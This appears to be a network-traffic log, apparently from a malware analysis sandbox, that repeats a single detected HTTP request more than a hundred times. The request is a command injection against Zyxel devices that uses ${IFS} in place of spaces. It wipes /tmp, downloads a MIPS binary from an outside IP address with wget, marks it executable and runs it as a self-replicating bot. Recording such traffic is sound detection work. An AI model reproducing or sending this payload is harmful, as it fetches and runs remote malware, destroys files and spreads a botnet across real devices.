Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
